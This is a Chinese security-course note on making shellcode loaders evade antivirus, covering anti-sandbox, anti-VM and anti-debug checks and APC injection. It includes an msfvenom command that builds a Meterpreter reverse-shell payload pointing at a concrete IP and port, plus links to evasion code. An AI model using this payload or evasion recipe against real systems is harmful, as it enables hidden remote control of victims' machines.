第117天:免杀对抗-反VT沙盒反虚拟机反调试进程APC注入项目保护

news2024/11/26 4:53:48

在这里插入图片描述

知识点

#知识点:
1、反VT-沙盒检测-Go&Python&C++
2、反调试-调试检测&进程注入-C++
3、反VT反调试-程序保护-工具项目类

#章节点:
编译代码面-ShellCode-混淆
编译代码面-编辑执行器-编写
编译代码面-分离加载器-编写
程序文件面-特征码定位-修改
程序文件面-加壳花指令-资源
代码加载面-Dll反射劫持-加载
权限逻辑面-杀毒进程干扰-结束
工具数据面-通讯内存流量-动态

对抗目标:
X60 Defender 某绒 管家 VT等

编程语言:
C/C++ Python C# Go Powershell Ruby Java ASM NIM Vlang等。

涉及技术:
ShellCode混淆,无文件落地,分离拆分,白名单,DLL加载,Syscall,加壳加花,
资源修改,特征修改,二次开发CS,内存休眠,进程注入,反沙盒,反调试,CDN解析等

演示案例

1、反VT-沙盒检测-Go&Python&C++
2、反调试-调试检测&进程注入-C++
3、反VT反调试-程序保护-工具项目类
近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检测率。
其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。

一、调试器检测
  - 基本的例如 IsDebuggerPresent API ,PEB.BeingDebugged...
  - TLS 回调
  - hard/software breakpoints
  - VirtualAlloc
  ...

二、DLL注入检测
  - 检测是否有DLL注入此进程来实现对进程的行为监控(HOOK)

三、Virtual Box 检测
  - 检测文件,例如VBoxMouse.sys, VirtualBox Guest Additions directory...
  - 检测注册表,进程,服务,例如VBoxControl.exe, VBoxService...
  - 检测硬件名称,MAC地址等等...

四、VMware 检测
  - 与VB检测类似

五、其他虚拟平台检测
- 例如 Xen, QEMU, Wine, Paralles...

六、分析工具进程检测
- 检测例如OD, ProcessMonitor, Autorun 等分析工具进程的存在....

七、通用沙盒/虚拟机检测
- 检测是否存在特殊进程名,模块名
- 通过WMI检测真实硬件状态,例如硬盘大小,内存大小,CPU风扇,型号,BIOS序列号名称,电源电压,温度等等...

1、微步沙盒:https://s.threatbook.cn/
2、腾讯哈勃分析系统:https://habo.qq.com/
3、魔盾:https://www.maldun.com/analysis/
4、微点沙盒:https://sandbox.depthsec.com.cn/index.php/
5、奇安信文件深度分析平台:https://sandbox.ti.qianxin.com/sandbox/page
6、ANYRUN:https://app.any.run/
7、HybridAnalysis (Falcon Sandbox):https://www.hybrid-analysis.com/
8、CAPE Sandbox: https://capesandbox.com/
9、BD Sandbox Analyzer:https://www.bitdefender.com/business/enterprise-products/sandbox-analyzer.html
10、Joe Sanbox: https://www.joesandbox.com/

#反VT-沙盒检测-Go&Python&C++
Go
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -f hex

Python
https://www.jb51.net/article/248175.htm
https://www.freebuf.com/articles/system/202717.html
https://blog.csdn.net/lc19920727/article/details/122820209

C/C++
https://github.com/sharepub/CheckVM-Sandbox

#反调试-调试检测&进程注入-C++
反沙盒&反虚拟机&APC进程注入
https://forum.butian.net/share/758
https://mp.weixin.qq.com/s/mC0XhNSwdhhISwcBFXe0uQ

#反VT反调试-程序保护-工具项目类
https://bbs.kafan.cn/thread-2181869-1-1.html
https://github.com/LordNoteworthy/al-khaser

总结

"反VT反调试"大致实现流程为:先检测是否在虚拟机或沙箱中运行,若不是则执行shellcode,反之则不执行。

检测是否在"虚拟机"中运行,参考以下方法:
1、通过进程名检测VMware&VirtualBox(类似Vmtoolsd.exe和Vmtoolsd.exe)
2、检测注册表(类似HKLM\SOFTWARE\Vmware Inc\Vmware Tools)
3、检测硬盘中的文件(类似C:\windows\System32\Drivers\Vmmouse.sys)
4、判断运行中的服务(类似VMTools和Vmrawdsk)
5、检测mac地址前缀(类似00:05:69 (Vmware)和08:00:27 (VirtualBox)6、使用CPUID指令检测虚拟机(CPUID的作用是允许软件发现处理器的详细信息)

检测是否在"沙盒"中运行,参考以下方法:
1、延迟运行(沙箱检测运行的时间一般比较短,所以我们可以延迟等待一会儿后再进行真实的操作)
2、检测开机时间(一般沙箱检测完毕后会重置系统,根据开机时间来判断是否是真机,比如小于1个小时返回false)
3、检测物理内存(绝大多数真机内存都大于4G,可检测内存是否大于4G来判断是否是真机)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/784984.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Tripwire 完整性分析工具(Linxu系统)

环境:centos7 工作流程: 当前的系统数据状态建立数据库定期比较系统现状与数据库中的状态属性改变有详细报告分析报告发现入侵 1、安装相关软件包 [roothello ~]# yum install epel-release -y 已加载插件:fastestmirror Repository base …

自学网络安全(黑客)全笔记

一、什么是网络安全 网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面…

了解Unity编辑器之组件篇Mesh(三)

Mesh:是一种三维模型的表示形式,它由一系列顶点、三角形(或其他多边形)和相关属性组成。Mesh用于表示物体的外观和形状,它是可见物体的基本组成部分。通过操作Mesh,开发者可以实现各种视觉效果、物理模拟和…

AI人工智能一键图片/视频换脸-Roop

软件介绍 Roop 换脸技术是一种基于深度学习的人脸图像处理技术。 技术原理 Roop换脸技术的实现主要分为两个步骤:人脸检测与对齐、特征融合与生成。 1.人脸检测与对齐在Roop换脸技术中,首先需要对输入的图像进行人脸检测与对齐。这一步骤的目的是确保…

Ubuntu搭建Samba服务-学习记录

文章目录 Ubuntu安装Samba流程Samba配置文件Samba添加账户配置文件修改Samba服务控制设置开机自动启动通过systemctl 启动服务通过 rc.local 启动 Windows访问参考链接 当前文章仅用于记录,在 Ubuntu中安装使用Samba,在Windows访问 系统环境:…

ChatGPT应用|科大讯飞星火杯认知大模型场景创新赛开始报名了!

ChatGPT发布带来的 AI 浪潮在全球疯狂蔓延,国内掀起的大模型混战已经持续半年之久,国产大模型数量正以惊人的速度增长,据不完全统计,截止7月14号已经达到了111个,所谓的“神仙打架”不过如此了吧。 ( 包括但…

SpringBoot与文档excel,pdf集成案例分享

一、文档类型介绍 1、Excel文档 Excel一款电子表格软件。直观的界面、出色的计算功能和图表工具,在系统开发中,经常用来把数据转存到Excel文件,或者Excel数据导入系统中,这就涉及数据转换问题。 2、PDF文档 PDF是可移植文档格…

Java程序设计六大原则设计模式

Java程序设计六大原则 一、单一职责原则: 一个接口或者类只有一个原因引起变化,即一个接口或者类只有一个职责,负责一件事情。(此原则同样适用于方法) 好处:1、复杂性降低;2、可读性提高&…

深度学习和神经网络

人工神经网络分为两个阶段: 1 :接收来自其他n个神经元传递过来的信号,这些输入信号通过与相应的权重进行 加权求和传递给下个阶段。(预激活阶段) 2:把预激活的加权结果传递给激活函数 sum :加权 f:激活…

代码随想录算法训练营之JAVA|第十一天| 239. 滑动窗口最大值

今天是第11天刷leetcode,立个flag。 算法挑战链接 239. 滑动窗口最大值https://leetcode.cn/problems/sliding-window-maximum/description/ 第一想法 题目理解:找到滑动窗口中最大的值,写入数组中,返回该数组即可。 第一个想…

VeriEye 13.0商用虹膜识别软件python SDK试用指南

最近,商用虹膜识别软件VeriEye 13.0发布,且额外地新增了python接口,这样就很方便大家直接调用其提供的虹膜识别接口了。 在使用python接口前,需要先下载安装试用版SDK,然后激活许可证。具体如下: 1. VeriE…

代码审计利器 Fortify SCA 2023.1(23.1) Crack

Fortify SCA 支持丰富的开发环境、语言、平台和框架,可对开发与生产混合环境进行安全检查。 25 种编程语言 超过 911,000 个组件级 API 可检测超过 961 个漏洞类别 支持所有主流平台、构建环境和 IDE。 Fortify SCA是一款商业软件,价格较为昂贵&#xf…

基金”中考”百亿基金经理”惜墨如金”

时下是基金二季报披露高峰,基民往往会期盼基金经理能在季报里带来“定心丸”。但个别基金经理的投资分析仅一两百字带过,对业绩亏损和调仓思路等关键问题更是直接忽略。 券商中国记者发现,有管理规模超370亿的基金经理,投资运作分…

ZohoProjects入选2022年度项目及项目组合管理类

有效的项目管理方法保证项目按照进度、成本、质量要求进行交付,是针对单个项目或项目群的管理,从而确保项目符合企业的战略目标,实现企业收益最大化。 对于项目管理工作来说,我们通常会认为只有专业的经理才能胜任,软件…

【每日一题】—— C. Game with Reversing (Codeforces Round 879 (Div. 2))

🌏博客主页:PH_modest的博客主页 🚩当前专栏:每日一题 💌其他专栏: 🔴 每日反刍 🟡 C跬步积累 🟢 C语言跬步积累 🌈座右铭:广积粮,缓称…

flask框架的请求处理逻辑

Django 和 Flask 是 Python 的两个非常流行的 Web 框架,它们对 HTTP 请求的处理方式有一些区别。 在 Django 中,当你的应用接收到一个 HTTP 请求时,Django 会将请求封装为一个 HttpRequest 对象,然后通过视图函数的参数传递这个对…

【计算机网络】简易TCP网络小程序

文章目录 1. 简易TCP网络程序1.1 服务端1.1.1 服务端创建套接字1.1.2 服务端绑定1.1.3 服务端监听1.1.4 服务端获取连接1.1.5 服务端处理请求 1.2 客户端1.2.1 客户端创建套接字1.2.2 客户端连接服务器1.2.3 客户端发起请求 1.3 服务器测试1.4 单执行流服务器的弊端 2. 多进程版…

【个人笔记】Linux的用户登录与退出

目录 Linux 的发行版Linux 的登录1.命令行登录2.ssh登录3.图形界面登录图形模式与文字模式的切换方式 Linux 的退出Linux 的关机与重启Linux 查看用户登录Linux在线命令工具 Linux 的发行版 Linux 的发行版说简单点就是将 Linux 内核与应用软件做一个打包。 目前市面上较知名…

使用Spring Boot实现Redis键过期回调功能

使用Spring Boot实现Redis键过期回调功能 当使用Redis作为缓存或数据存储的时候,有时候需要在键过期时执行一些特定的操作,比如清除相关数据或发送通知。在Spring Boot中,可以通过实现RedisMessageListener接口来实现Redis键过期回调功能。下…